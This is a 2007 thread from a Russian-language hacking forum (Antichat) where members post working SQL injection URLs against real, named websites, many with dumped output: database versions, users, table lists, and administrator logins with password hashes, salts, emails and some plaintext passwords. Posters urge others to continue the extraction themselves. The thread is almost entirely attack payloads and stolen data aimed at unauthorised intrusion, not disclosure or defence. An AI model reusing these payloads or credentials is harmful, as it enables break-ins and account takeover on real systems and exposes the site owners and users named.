ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3931  
Старый 02.12.2007, 00:24
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

vedu.ru

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+system_user)-- writer

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+db_name())-- PortalDB


http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+cast(Username+as+nvarchar)%2B %27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27 %2Bcast(Salt+as+nvarchar)%2B%27%3A%27%2Bcast(Autho r_email+as+nvarchar)+from+frm_Author)--

логин/хеш/соль/мейл
superviser:561C4AF0B29C278947A313635ADDA7:93BE1FB7 A5A:evs@sec21.ru

дальше сами )

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+('prt_FAQ','p rt_Vote','tst_razdels','dtproperties','frm_ActiveU ser','frm_Author','frm_BanList','frm_blob_file',
'frm_blob_image','frm_BuddyList','frm_Category','f rm_Configuration','frm_DateTimeFormat','frm_EmailN otify','frm_Forum','frm_Group','frm_GuestName','fr m_Permissions','frm_PMMessage','frm_Poll',%20'frm_ PollChoice','frm_Smut','frm_Thread','frm_Topic',
'frm_UserRoles','prt_announce','prt_announce_Group ','prt_Articles','prt_Articles_Comment','prt_Artic les_Group','prt_Articles_Ozenka','prt_Articles_Tre e','prt_Articles_Tree_Permissions','prt_Connector' ,'prt_FAQ_group','prt_Files','prt_Images','prt_Key s_Edulib',
'prt_myNavigator','prt_News','prt_News_Group','prt _part_name','prt_part_permissions','prt_Person'))-- и тд.

--------------------------------------------------------------------------
contester.tsure.ru

http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

5.0.15-log/contest2/webapp@localhost


http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,login,hash_password) +from+logins+limit+0,1/*

admin/*222512147AA24FDF67BC90EC2ED8B4E178D33600

--------------------------------------------------------------------------
stroy-press.ru

http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7/*

4.1.18/ccr_ru_1/ccr@localhost



http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,username,passwor d),4,5,6,7+from+users+limit+1,1/*

логин/пароль
123/6W7FCY8X
 
Ответить с цитированием

  #3932  
Старый 02.12.2007, 00:38
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию

http://www.mw.org.pl
Код:
http://www.mw.org.pl/t.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users/*
не смог подобрать колонки =(

http://www.astrotur.ru
Код:
http://www.astrotur.ru/index1.php?id=-1+union+select+1,2,3/*
ostapenko_atur@localhost
4.1.20
ostapenko_atur
 
Ответить с цитированием

  #3933  
Старый 02.12.2007, 03:59
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

Цитата:
Сообщение от KEHT33  
Компания АСКОН
smf_members (чёт не получилось просматреть юзеров)
Код:
http://www.ascon.ru/?news=361+UNION+SELECT+1,2,3,concat_ws(0x05,ID_MEMBER,ID_GROUP,memberName,passwd,passwordSalt,emailAddress),5,6+FROM+forum.smf_members+limit+1,1/*
 
Ответить с цитированием

  #3934  
Старый 02.12.2007, 11:06
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

www.ugatu.ac.ru
Код:
http://www.ugatu.ac.ru/Aviator/read_article.php?id=-598+union+select+1,password,3,4,5,6+from+mysql.user/*
user:csit
password:1458953a0af2898b

Последний раз редактировалось Iceangel_; 02.12.2007 в 12:01..
 
Ответить с цитированием

  #3935  
Старый 02.12.2007, 18:43
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.joygregory.co.uk/

Код:
http://www.joygregory.co.uk/news/details.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+admin/*
 
Ответить с цитированием

  #3936  
Старый 02.12.2007, 18:44
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.tupelo.net/

Код:
http://www.tupelo.net/media-room/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Members+where+MemberID=2)--
http://www.baalynton.com/

Код:
http://www.baalynton.com/news.asp?news_id=-1+union+select+1,2,3,4,username,password,7,8,9,10,11+from+users/*
http://www.philipgreenfield.com/


Код:
http://www.philipgreenfield.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.elittech.ru/

Код:
http://www.elittech.ru/info/news.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+admin/*
 
Ответить с цитированием

  #3937  
Старый 02.12.2007, 18:57
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию

http://www.psychasoc.com
Код:
http://www.psychasoc.com/print_news.php?ID=-1+union+select+login,2,3,4,password+from+admin/*
jojo:429985a327c0097d

http://www.llatalent.com
Код:
http://www.llatalent.com/current/index.php?current_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.0.27-standard
dbm.llatalent.com@web162.megawebservers.com
admin_llatalent_com
 
Ответить с цитированием

  #3938  
Старый 02.12.2007, 19:41
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Центр Коммерческой недвижимости (довольно известная компания)
PR:4
Код:
http://www.ckn.ru/srochnoall.php?id=-9+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/*
wwwrealtor@localhost:4.0.27-1-log:wwwrealtor
 
Ответить с цитированием

  #3939  
Старый 02.12.2007, 20:05
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.wttrec.com/ Че-то про теннис....

Код:
http://www.wttrec.com/news/news_info.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users+where+user_id=1)--
Дальше перебираем по id...
 
Ответить с цитированием

  #3940  
Старый 02.12.2007, 20:29
P1rat
Новичок
Регистрация: 27.03.2007
Сообщений: 26
Провел на форуме:
446935

Репутация: 23
По умолчанию

www.hro.org
Код:
http://www.hro.org/get_rubric.php?id=999+union+select+1,password,3,4,5,6,7+from+user/*
user:hroorg
password:dancer
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ